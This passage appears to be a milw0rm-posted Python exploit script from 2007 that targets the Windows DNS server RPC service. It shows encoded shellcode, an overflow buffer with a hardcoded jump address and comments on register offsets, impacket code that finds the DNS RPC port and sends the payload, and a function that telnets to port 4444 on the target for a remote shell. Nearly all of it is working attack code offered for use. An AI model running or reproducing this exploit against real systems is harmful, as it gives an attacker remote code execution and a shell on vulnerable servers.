"\x4d\xe7\x98\x40\xbe\xb5\x60\xfa\xbc\xb5\x66\xc1\x0c\x03\x30\xe0" shellcode += "\xbe\xb5\x60\xf9\xbd\x1e\xe3\x56\x39\xd9\xde\x4e\x90\x8c\xcf\xfe" shellcode += "\x16\x9c\xe3\x56\x39\x2c\xdc\xcd\x8f\x22\xd5\xc4\x60\xaf\xdc\xf9" shellcode += "\xb0\x63\x7a\x20\x0e\x20\xf2\x20\x0b\x7b\x76\x5a\x43\xb4\xf4\x84" shellcode += "\x17\x08\x9a\x3a\x64\x30\x8e\x02\x42\xe1\xde\xdb\x17\xf9\xa0\x56" shellcode += "\x9c\x0e\x49\x7f\xb2\x1d\xe4\xf8\xb8\x1b\xdc\xa8\xb8\x1b\xe3\xf8" shellcode += "\x16\x9a\xde\x04\x30\x4f\x78\xfa\x16\x9c\xdc\x56\x16\x7d\x49\x79" shellcode += "\x62\x1d\x4a\x2a\x2d\x2e\x49\x7f\xbb\xb5\x66\xc1\x19\xc0\xb2\xf6" shellcode += "\xba\xb5\x60\x56\x39\x4a\xb6\xa9" # Stub sections taken from metasploit stub = '\xd2\x5f\xab\xdb\x04\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00' stub += '\x70\x00\x00\x00\x00\x00\x00\x00\x1f\x38\x8a\x9f\x12\x05\x00\x00' stub += '\x00\x00\x00\x00\x12\x05\x00\x00' stub += '\\A' * 465 # At the time of overflow ESP points into our buffer which has each char # prepended by a '\' and our shellcode code is about 24+ bytes away from # where EDX points stub += '\\\x80\\\x62\\\xE1\\\x77'#Address of jmp esp from user32.dll # The following B's which in assembly translates to 'inc EDX' increments # about 31 times EDX so that it points into our shellcode stub += '\\B' * 43 # Translates to 'jmp EDX' stub += '\\\xff\\\xe2' stub += '\\A' * 134 stub += '\x00\x00\x00\x00\x76\xcf\x80\xfd\x03\x00\x00\x00\x00\x00\x00\x00' stub += '\x03\x00\x00\x00\x47\x00\x00\x00' stub += shellcode # Code ripped from core security document on impacket # www.coresecurity.com/files/attachments/impacketv0.9.6.0.pdf # Not a neat way to discover a dynamic port :-) def DiscoverDNSport(target): trans = transport.SMBTransport(target, 139, 'epmapper') trans.connect() dce = dcerpc.DCERPC_v5(trans) dce.bind(uuid.uuidtup_to_bin(('E1AF8308-5D1F-11C9-91A4-08002B14A0FA','3.0'))) pm = epm.DCERPCEpm(dce) handle = '\x00'*20 while 1: dump = pm.portmap_dump(handle) if not dump.get_entries_num(): break handle = dump.get_handle() entry = dump.get_entry().get_entry() if(uuid.bin_to_string(entry.get_uuid()) == '50ABC2A4-574D-40B3-9D66-EE4FD5FBA076'): port = entry.get_string_binding().split('[')[1][:-1] return int(port) print '[-] Could not locate DNS port; Target might not be running DNS' def ExploitDNS(target, port): trans = transport.TCPTransport(target, port) trans.connect() dce = dcerpc.DCERPC_v5(trans) dce.bind(uuid.uuidtup_to_bin(('50abc2a4-574d-40b3-9d66-ee4fd5fba076','5.0'))) dce.call(0x01, stub) def ConnectRemoteShell(target): connect = "/usr/bin/telnet " + target + " 4444" os.system(connect) if __name__ == '__main__': try: target = sys.argv[1] except IndexError: print 'Usage: %s <target ip address>' % sys.argv[0] sys.exit(-1) print '[+] Locating DNS RPC port' port = DiscoverDNSport(target) print '[+] Located DNS RPC service on TCP port: %d' % port ExploitDNS(target, port) print '[+] Exploit sent. Connecting to shell in 3 seconds' time.sleep(3) ConnectRemoteShell(target) # milw0rm.com [2007-04-15]